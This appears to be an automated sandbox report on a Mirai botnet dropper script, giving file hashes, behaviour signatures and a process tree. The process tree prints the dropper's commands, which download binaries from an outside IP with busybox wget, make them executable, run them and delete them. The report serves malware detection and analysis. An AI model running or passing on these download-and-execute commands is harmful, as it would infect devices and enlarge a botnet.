Analysis

  • max time kernel
    19s
  • max time network
    117s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    10/03/2025, 22:22

General

  • Target

    wget.sh

  • Size

    1KB

  • MD5

    fe3891afe068ca6fc86017361dfb753c

  • SHA1

    d631b6a4eaa99085df4260727c2c86dc82cf5428

  • SHA256

    8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0

  • SHA512

    810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/wget.sh
    /tmp/wget.sh
    1⤵
    • Executes dropped EXE
    PID:712
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklarm -O jklarm
      2⤵
      • Writes file to tmp directory
      PID:713
    • /bin/busybox
      /bin/busybox chmod +x jklarm
      2⤵
      • File and Directory Permissions Modification
      PID:723
    • /tmp/jklarm
      ./jklarm telnet
      2⤵
      PID:725
    • /bin/busybox
      /bin/busybox rm -rf jklarm
      2⤵
      PID:728
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5
      2⤵
      • Writes file to tmp directory
      PID:730
    • /bin/busybox
      /bin/busybox chmod +x jklarm5
      2⤵
      • File and Directory Permissions Modification
      PID:738
    • /tmp/jklarm5
      ./jklarm5 telnet
      2⤵
      PID:739
    • /bin/busybox
      /bin/busybox rm -rf jklarm5
      2⤵
      PID:741
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6
      2⤵
      • Writes file to tmp directory
      PID:743
    • /bin/busybox
      /bin/busybox chmod +x jklarm6
      2⤵
      • File and Directory Permissions Modification
      PID:749
    • /tmp/jklarm6
      ./jklarm6 telnet
      2⤵
      PID:750
    • /bin/busybox
      /bin/busybox rm -rf jklarm6
      2⤵
      PID:753
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7
      2⤵
      • Writes file to tmp directory
      PID:754
    • /bin/busybox
      /bin/busybox chmod +x jklarm7
      2⤵
      • File and Directory Permissions Modification
      PID:755
    • /tmp/jklarm7
      ./jklarm7 telnet
      2⤵
      PID:756
    • /bin/busybox
      /bin/busybox rm -rf jklarm7
      2⤵
      PID:758
    • /bin/busybox
      /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k
      2⤵
      PID:759

Downloads

  • /tmp/jklarm

    Filesize

    60KB

    MD5

    35c215d8e2b2ea03a8a191fb3723195a

    SHA1

    c38bcfc3d7050edeff1b7dbffd85d07348bb01e9

    SHA256

    c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90

    SHA512

    ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8

  • /tmp/jklarm5

    Filesize

    60KB

    MD5

    a04040c769cad786555e183ba8ae0ca0

    SHA1

    a89d6b50a8140dddce29595c64949214e65c84f1

    SHA256

    7568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3

    SHA512

    e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162

  • /tmp/jklarm6

    Filesize

    69KB

    MD5

    9e18604aa4c5bedd6e9ea6690b751880

    SHA1

    c1f32fe93aa650f9920fc5bd659d23621ab034a2

    SHA256

    41342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb

    SHA512

    cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0

  • /tmp/jklarm7

    Filesize

    82KB

    MD5

    a9675614a267473cb83e195d9074a067

    SHA1

    a4d148cf841fc2b84c8bb3dd322e40f601532875

    SHA256

    fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9

    SHA512

    8adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28